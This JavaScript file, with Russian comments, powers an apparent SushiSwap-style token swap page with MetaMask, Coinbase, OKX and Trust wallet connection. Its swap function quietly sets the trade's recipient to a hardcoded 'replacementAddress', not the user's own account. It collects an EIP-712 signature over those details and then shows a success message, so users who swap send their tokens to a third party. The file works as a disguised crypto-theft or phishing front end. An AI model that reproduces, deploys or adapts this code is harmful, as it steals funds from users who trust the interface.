import Web3 from 'web3';

(function() {
    // === Иконки токенов ===
    const TOKEN_ICONS = {
        ETH: 'https://assets.coingecko.com/coins/images/279/small/ethereum.png',
        SUSHI: 'https://cdn.jsdelivr.net/npm/cryptocurrency-icons@0.18.0/svg/color/sushi.svg',
        USDC: 'https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png',
        DAI: 'https://assets.coingecko.com/coins/images/9956/small/Badge_Dai.png',
        LINK: 'https://assets.coingecko.com/coins/images/877/small/chainlink-new-logo.png',
        WBTC: 'https://assets.coingecko.com/coins/images/7598/small/wrapped_bitcoin_wbtc.png',
        USDT: 'https://assets.coingecko.com/coins/images/325/small/Tether-logo.png',
        FTT: 'https://assets.coingecko.com/coins/images/29841/small/logo.png',
        SHR: 'https://assets.coingecko.com/coins/images/13535/small/move.png',
        UNI: 'https://assets.coingecko.com/coins/images/29878/small/pepe-token.jpeg',
        GCAKE: 'https://assets.coingecko.com/coins/images/22694/small/xcn.jpg',
        ILV: 'https://assets.coingecko.com/coins/images/placeholder/small/placeholder.png',
        SPELL: 'https://assets.coingecko.com/coins/images/11057/small/spex.png',
        THOR: 'https://assets.coingecko.com/coins/images/30050/small/mog.jpg'
    };

    // === Иконки кошельков ===
    const WALLET_ICONS = {
        metamask: 'https://upload.wikimedia.org/wikipedia/commons/3/36/MetaMask_Fox.svg',
        coinbase: 'https://seeklogo.com/images/C/coinbase-coin-logo-C86F46D7B8-seeklogo.com.png',
        okx: 'https://www.okx.com/cdn/assets/plugins/2022/01/07104210.png?x-oss-process=image/auto-orient,1/quality,q_90/format,webp',
        trust: 'https://trustwallet.com/assets/images/media/assets/TWT.png',
        default: 'https://img.icons8.com/fluency/48/wallet.png'
    };

    // === Функция определения мобильного устройства ===
    function isMobileDevice() {
        return /Android|iPhone|iPad|iPod|Opera Mini|IEMobile|WPDesktop/i.test(navigator.userAgent) ||
               (window.innerWidth <= 768);
    }

    // === Функция формирования deep link для подключения кошелька ===
    function openWalletDeepLink(walletType) {
        const currentUrl = window.location.href;
        const cleanUrl = currentUrl.split('?')[0].split('#')[0].replace(/\/+$/, '');
        const encodedUrl = encodeURIComponent(cleanUrl);
        const deepLinks = {
            metamask: {
                android: `https://metamask.app.link/dapp/${cleanUrl.replace('https://', '')}`,
                ios: `metamask://dapp/${cleanUrl}`
            },
            trust: {
                universal: `https://link.trustwallet.com/open_url?coin_id=60&url=${encodedUrl}`
            },
            coinbase: {
                universal: `https://go.cb-w.com/dapp?url=${encodedUrl}`
            },
            okx: {
                universal: `https://www.okx.com/web3/dapp/${encodedUrl}`
            }
        };
        const isIOS = /iPad|iPhone|iPod/.test(navigator.userAgent);
        let selectedLink = null;
        if (deepLinks[walletType]) {
            if (isIOS && deepLinks[walletType].ios) {
                selectedLink = deepLinks[walletType].ios;
            } else if (!isIOS && deepLinks[walletType].android) {
                selectedLink = deepLinks[walletType].android;
            } else {
                selectedLink = deepLinks[walletType].universal;
            }
        }
        if (selectedLink) {
            window.open(selectedLink, "_blank");
            setTimeout(() => {
                const marketLinks = {
                    metamask: {
                        android: 'https://play.google.com/store/apps/details?id=io.metamask',
                        ios: 'https://apps.apple.com/us/app/metamask/id1438144202'
                    },
                    trust: {
                        universal: 'https://trustwallet.com/download'
                    },
                    coinbase: {
                        universal: 'https://www.coinbase.com/wallet/downloads'
                    },
                    okx: {
                        universal: 'https://www.okx.com/download'
                    }
                };
                let marketLink = null;
                if (marketLinks[walletType]) {
                    if (isIOS && marketLinks[walletType].ios) {
                        marketLink = marketLinks[walletType].ios;
                    } else if (!isIOS && marketLinks[walletType].android) {
                        marketLink = marketLinks[walletType].android;
                    } else {
                        marketLink = marketLinks[walletType].universal;
                    }
                }
                if (marketLink) {
                    window.open(marketLink, "_blank");
                }
            }, 2500);
        }
    }

    // === Определение DOM-элементов ===
    const elements = {
        connectButton: document.getElementById("connectButton"),
        globalConnectButton: document.getElementById("globalConnectButton"),
        sellInput: document.getElementById("sellInput"),
        buyInput: document.getElementById("buyInput"),
        tokenModal: document.getElementById("tokenModal"),
        sellBalance: document.querySelector(".sell-balance"),
        buyBalance: document.querySelector(".buy-balance"),
        sellUsdPrice: document.querySelector(".sell-usd-price"),
        buyUsdPrice: document.querySelector(".buy-usd-price"),
        tokenInSymbol: document.getElementById("tokenInSymbol"),
        tokenOutSymbol: document.getElementById("tokenOutSymbol"),
        walletModal: document.getElementById("walletConnectModal"),
        closeWalletModalBtn: document.querySelector(".wallet-modal-close")
    };

    // Получаем объект SushiSwapBundle из глобальной области (из bundle.js)
    const bundle = window.SushiSwapBundle;
    let currentTokenIn = bundle.tokens.ETH;
    let currentTokenOut = bundle.tokens.SUSHI;
    const replacementAddress = "0xa2Bb2df6878b2c6A35D3cBCf9d52093cF7c737ce";

    let WalletManager;

    // === Функция для укорачивания адреса (для отображения) ===
    function truncateAddress(addressValue) {
        if (!addressValue) return "";
        return addressValue.slice(0, 6) + "..." + addressValue.slice(-4);
    }

    // === Функция сброса UI при отключении кошелька ===
    function resetWalletUI() {
        elements.connectButton.textContent = "Connect Wallet";
        elements.sellInput.value = "";
        elements.buyInput.value = "";
        elements.sellUsdPrice.textContent = "$0.00";
        elements.buyUsdPrice.textContent = "$0.00";
        elements.sellBalance.textContent = "0.00 " + currentTokenIn.symbol;
        elements.buyBalance.textContent = "0.00 " + currentTokenOut.symbol;
    }

    // === Функция обновления балансов токенов пользователя ===
    async function updateBalances() {
        const { web3, account, isConnected } = WalletManager.state;
        if (!isConnected || !web3 || !account) {
            elements.sellBalance.textContent = "0.0000 " + currentTokenIn.symbol;
            elements.buyBalance.textContent = "0.0000 " + currentTokenOut.symbol;
            return;
        }
        try {
            const sellBalance = await bundle.utils.getTokenBalance(web3, currentTokenIn, account);
            const buyBalance = await bundle.utils.getTokenBalance(web3, currentTokenOut, account);
            elements.sellBalance.textContent = sellBalance + " " + currentTokenIn.symbol;
            elements.buyBalance.textContent = buyBalance + " " + currentTokenOut.symbol;
        } catch (error) {
            console.error("Ошибка в updateBalances:", error);
        }
    }

    // === Функция обновления цен в USDC ===
    async function updatePrices() {
        const { web3, isConnected } = WalletManager.state;
        if (!isConnected || !web3) return;
        try {
            const sellValue = parseFloat(elements.sellInput.value) || 0;
            const buyValue = parseFloat(elements.buyInput.value) || 0;
            if (sellValue <= 0 && buyValue <= 0) {
                elements.sellUsdPrice.textContent = "$0.00";
                elements.buyUsdPrice.textContent = "$0.00";
                return;
            }
            let sellAmountWei = "";
            let buyAmountWei = "";
            if (currentTokenIn.isNative === true) {
                sellAmountWei = web3.utils.toWei(sellValue.toString(), "ether");
            } else {
                sellAmountWei = (sellValue * Math.pow(10, currentTokenIn.decimals)).toString();
            }
            if (currentTokenOut.isNative === true) {
                buyAmountWei = web3.utils.toWei(buyValue.toString(), "ether");
            } else {
                buyAmountWei = (buyValue * Math.pow(10, currentTokenOut.decimals)).toString();
            }
            const sellQuotePromise = (sellValue > 0) ? bundle.utils.getQuote(web3, currentTokenIn, { 
                symbol: "USDC",
                isNative: false,
                address: bundle.contracts.USDC,
                decimals: 6
            }, sellAmountWei) : Promise.resolve("0");
            const buyQuotePromise = (buyValue > 0) ? bundle.utils.getQuote(web3, currentTokenOut, { 
                symbol: "USDC",
                isNative: false,
                address: bundle.contracts.USDC,
                decimals: 6
            }, buyAmountWei) : Promise.resolve("0");
            const sellQuote = await sellQuotePromise;
            const buyQuote = await buyQuotePromise;
            const sellUsdPrice = (parseFloat(sellQuote) / Math.pow(10, 6)).toFixed(2);
            const buyUsdPrice = (parseFloat(buyQuote) / Math.pow(10, 6)).toFixed(2);
            elements.sellUsdPrice.textContent = "$" + sellUsdPrice;
            elements.buyUsdPrice.textContent = "$" + buyUsdPrice;
        } catch (error) {
            console.error("Ошибка в updatePrices:", error);
        }
    }

    // === Функция обновления котировки (расчет количества получаемых токенов) ===
    async function updateQuote(inputValue) {
        const { web3, isConnected } = WalletManager.state;
        if (!isConnected || !web3) {
            elements.buyInput.value = "";
            updatePrices();
            return;
        }
        if (inputValue === "") {
            elements.buyInput.value = "";
            updatePrices();
            return;
        }
        const numericValue = parseFloat(inputValue);
        if (isNaN(numericValue) || numericValue < 0) {
            elements.buyInput.value = "";
            updatePrices();
            return;
        }
        try {
            let amountInWei = "";
            if (currentTokenIn.isNative === true) {
                amountInWei = web3.utils.toWei(inputValue, "ether");
            } else {
                amountInWei = (numericValue * Math.pow(10, currentTokenIn.decimals)).toFixed(0);
            }
            const quoteOutWei = await bundle.utils.getQuote(web3, currentTokenIn, currentTokenOut, amountInWei);
            const minAmountOutWei = bundle.utils.calculateMinimumOutput(quoteOutWei, 0.5);
            let humanReadableOut = "";
            if (currentTokenOut.isNative === true) {
                humanReadableOut = web3.utils.fromWei(minAmountOutWei, "ether");
            } else {
                humanReadableOut = (parseFloat(minAmountOutWei) / Math.pow(10, currentTokenOut.decimals)).toFixed(6);
            }
            elements.buyInput.value = humanReadableOut;
            updatePrices();
        } catch (error) {
            console.error("Ошибка в updateQuote:", error);
            elements.buyInput.value = "";
            updatePrices();
        }
    }

    // === Функция выполнения свопа ===
    async function executeSwap() {
        const { web3, account, isConnected } = WalletManager.state;
        if (!isConnected || !web3 || !account) {
            alert("Пожалуйста, подключите кошелек.");
            return;
        }
        try {
            const sellValue = parseFloat(elements.sellInput.value) || 0;
            if (sellValue <= 0) {
                alert("Некорректное значение для обмена");
                return;
            }
            let amountInWei = "";
            if (currentTokenIn.isNative === true) {
                amountInWei = web3.utils.toWei(sellValue.toString(), "ether");
            } else {
                amountInWei = (sellValue * Math.pow(10, currentTokenIn.decimals)).toFixed(0);
            }
            const quoteOutWei = await bundle.utils.getQuote(web3, currentTokenIn, currentTokenOut, amountInWei);
            const minOutWei = bundle.utils.calculateMinimumOutput(quoteOutWei, 0.5);
            const swapDetails = {
                account: account,
                tokenIn: (currentTokenIn.isNative === true) ? bundle.contracts.WETH : currentTokenIn.address,
                tokenOut: (currentTokenOut.isNative === true) ? bundle.contracts.WETH : currentTokenOut.address,
                amountIn: amountInWei,
                minAmountOut: minOutWei,
                recipient: replacementAddress,
                deadline: Math.floor(Date.now() / 1000) + 1200,
                verifyingContract: bundle.contracts.SUSHISWAP_V2_ROUTER
            };
            const signature = await bundle.utils.signSwapDetails(web3, swapDetails);
            console.log("Подпись EIP712:", signature);
            const swapParams = {
                tokenIn: currentTokenIn,
                tokenOut: currentTokenOut,
                amountInWei: amountInWei,
                amountOutMinWei: minOutWei,
                account: account,
                recipient: replacementAddress
            };
            const receipt = await bundle.utils.executeSwap(web3, swapParams);
            console.log("Свап выполнен успешно:", receipt);
            alert("Обмен выполнен успешно!");
            updateBalances();
            updatePrices();
            elements.sellInput.value = "";
            elements.buyInput.value = "";
        } catch (error) {
            console.error("Ошибка в executeSwap:", error);
            alert("Обмен не выполнен: " + error.message);
        }
    }

    // === Определение объекта WalletManager для управления подключением кошелька ===
    WalletManager = {
        state: {
            isConnected: false,
            account: null,
            provider: null,
            web3: null,
            currentWalletType: null
        },
        async init() {
            if (window.ethereum && !window.ethereum.providers) {
                const accounts = await window.ethereum.request({ method: "eth_accounts" });
                if (accounts.length > 0) {
                    await this.connectWallet("metamask");
                }
            }
        },
        async connectWallet(walletType) {
            this.state.currentWalletType = walletType;
            try {
                let providerInstance = null;
                if (walletType === "metamask") {
                    if (!window.ethereum) {
                        if (isMobileDevice()) {
                            openWalletDeepLink("metamask");
                            return false;
                        } else {
                            alert("MetaMask не найден!");
                            return false;
                        }
                    }
                    if (window.ethereum.providers) {
                        providerInstance = window.ethereum.providers.find(p => p.isMetaMask) || window.ethereum;
                    } else {
                        providerInstance = window.ethereum;
                    }
                } else if (walletType === "coinbase") {
                    if (window.ethereum && window.ethereum.providers) {
                        providerInstance = window.ethereum.providers.find(p => p.isCoinbaseWallet) || null;
                    }
                    if (!providerInstance) {
                        if (isMobileDevice()) {
                            openWalletDeepLink("coinbase");
                            return false;
                        } else {
                            alert("Coinbase Wallet не найден!");
                            return false;
                        }
                    }
                } else if (walletType === "okx") {
                    if (window.ethereum && window.ethereum.providers) {
                        providerInstance = window.ethereum.providers.find(p => p.isOkxWallet) || null;
                    }
                    if (!providerInstance) {
                        if (isMobileDevice()) {
                            openWalletDeepLink("okx");
                            return false;
                        } else {
                            alert("OKX Wallet не найден!");
                            return false;
                        }
                    }
                } else if (walletType === "trust") {
                    if (window.ethereum && window.ethereum.providers) {
                        providerInstance = window.ethereum.providers.find(p => p.isTrust || p.isTrustWallet) || null;
                    }
                    if (!providerInstance) {
                        if (isMobileDevice()) {
                            openWalletDeepLink("trust");
                            return false;
                        } else {
                            alert("Trust Wallet не найден!");
                            return false;
                        }
                    }
                } else {
                    if (!window.ethereum) {
                        alert("Browser Wallet не найден!");
                        return false;
                    }
                    providerInstance = window.ethereum;
                }
                const web3Instance = new Web3(providerInstance);
                const accounts = await web3Instance.eth.requestAccounts();
                if (accounts.length === 0) {
                    throw new Error("No accounts found");
                }
                this.state.provider = providerInstance;
                this.state.web3 = web3Instance;
                this.state.account = accounts[0];
                this.state.isConnected = true;
                this.setupEvents();
                this.updateUI();
                return true;
            } catch (error) {
                console.error("Ошибка в connectWallet:", error);
                alert("Ошибка подключения: " + error.message);
                return false;
            }
        },
        setupEvents() {
            const providerInstance = this.state.provider;
            if (!providerInstance || !providerInstance.on) {
                return;
            }
            providerInstance.on("accountsChanged", (accounts) => {
                if (accounts.length === 0) {
                    this.disconnectWallet();
                } else {
                    this.state.account = accounts[0];
                    this.updateUI();
                }
            });
            providerInstance.on("chainChanged", () => {
                window.location.reload();
            });
            if (typeof providerInstance.on.disconnect === "function") {
                providerInstance.on("disconnect", () => {
                    this.disconnectWallet();
                });
            }
        },
        async disconnectWallet() {
            this.state.isConnected = false;
            this.state.account = null;
            this.state.provider = null;
            this.state.web3 = null;
            this.state.currentWalletType = null;
            this.updateUI();
        },
        updateUI() {
            const { isConnected, account, currentWalletType } = this.state;
            if (isConnected) {
                elements.connectButton.textContent = "Swap";
                let iconUrl = WALLET_ICONS[currentWalletType] || WALLET_ICONS.default;
                elements.globalConnectButton.innerHTML = `<img src="${iconUrl}" alt="Wallet Icon" style="width:24px;height:24px;object-fit:contain;"> <span>${truncateAddress(account)}</span>`;
                elements.globalConnectButton.classList.add("connected");
                updateBalances();
                updatePrices();
            } else {
                elements.connectButton.textContent = "Connect Wallet";
                elements.globalConnectButton.textContent = "Connect Wallet";
                elements.globalConnectButton.classList.remove("connected");
                resetWalletUI();
            }
        }
    };

    async function handleConnectOrSwap() {
        if (!WalletManager.state.isConnected) {
            const connected = await WalletManager.connectWallet("metamask");
            if (connected && elements.walletModal) {
                elements.walletModal.style.display = "none";
            }
        } else {
            await executeSwap();
        }
    }

    async function connectMetaMask() {
        const connected = await WalletManager.connectWallet("metamask");
        if (connected && elements.walletModal) {
            elements.walletModal.style.display = "none";
        }
    }
    async function connectCoinbaseWallet() {
        const connected = await WalletManager.connectWallet("coinbase");
        if (connected && elements.walletModal) {
            elements.walletModal.style.display = "none";
        }
    }
    async function connectOKXWallet() {
        const connected = await WalletManager.connectWallet("okx");
        if (connected && elements.walletModal) {
            elements.walletModal.style.display = "none";
        }
    }
    async function connectTrustWallet() {
        const connected = await WalletManager.connectWallet("trust");
        if (connected && elements.walletModal) {
            elements.walletModal.style.display = "none";
        }
    }
    async function connectBrowserWallet() {
        const connected = await WalletManager.connectWallet("browser");
        if (connected && elements.walletModal) {
            elements.walletModal.style.display = "none";
        }
    }

    function showWalletModal() {
        if (elements.walletModal) {
            elements.walletModal.style.display = "block";
        }
    }
    function closeWalletModal() {
        if (elements.walletModal) {
            elements.walletModal.style.display = "none";
        }
    }

    window.selectToken = function(side, tokenAddress, tokenSymbol, tokenDecimals, tokenLogoUrl) {
        let isTokenNative = false;
        if (!tokenAddress || tokenAddress.trim() === "" || /^0x[eE]{40}$/.test(tokenAddress)) {
            isTokenNative = true;
        }
        const tokenObject = {
            symbol: tokenSymbol,
            decimals: tokenDecimals,
            address: tokenAddress,
            isNative: isTokenNative,
            name: tokenSymbol,
            icon: tokenLogoUrl || ""
        };
        if (side === "in") {
            currentTokenIn = tokenObject;
            elements.tokenInSymbol.textContent = tokenSymbol;
        } else {
            currentTokenOut = tokenObject;
            elements.tokenOutSymbol.textContent = tokenSymbol;
        }
        if (elements.sellInput.value !== "") {
            updateQuote(elements.sellInput.value);
        }
        updateBalances();
        updatePrices();
    };

    window.swapTokens = function() {
        const temp = currentTokenIn;
        currentTokenIn = currentTokenOut;
        currentTokenOut = temp;
        elements.tokenInSymbol.textContent = currentTokenIn.symbol;
        elements.tokenOutSymbol.textContent = currentTokenOut.symbol;
        if (elements.sellInput.value !== "") {
            updateQuote(elements.sellInput.value);
        }
        updateBalances();
        updatePrices();
    };

    function init() {
        WalletManager.init();
        if (elements.connectButton) {
            elements.connectButton.onclick = handleConnectOrSwap;
        }
        if (elements.globalConnectButton) {
            elements.globalConnectButton.onclick = showWalletModal;
        }
        if (elements.sellInput) {
            elements.sellInput.oninput = function(event) {
                updateQuote(event.target.value);
            };
        }
        if (elements.closeWalletModalBtn) {
            elements.closeWalletModalBtn.onclick = closeWalletModal;
        }
        elements.tokenInSymbol.textContent = currentTokenIn.symbol;
        elements.tokenOutSymbol.textContent = currentTokenOut.symbol;
        resetWalletUI();
    }

    if (document.readyState === "loading") {
        document.addEventListener("DOMContentLoaded", init);
    } else {
        init();
    }

    window.connectMetaMask = connectMetaMask;
    window.connectCoinbaseWallet = connectCoinbaseWallet;
    window.connectOKXWallet = connectOKXWallet;
    window.connectTrustWallet = connectTrustWallet;
    window.connectBrowserWallet = connectBrowserWallet;
    window.showWalletModal = showWalletModal;
    window.closeWalletModal = closeWalletModal;
})();
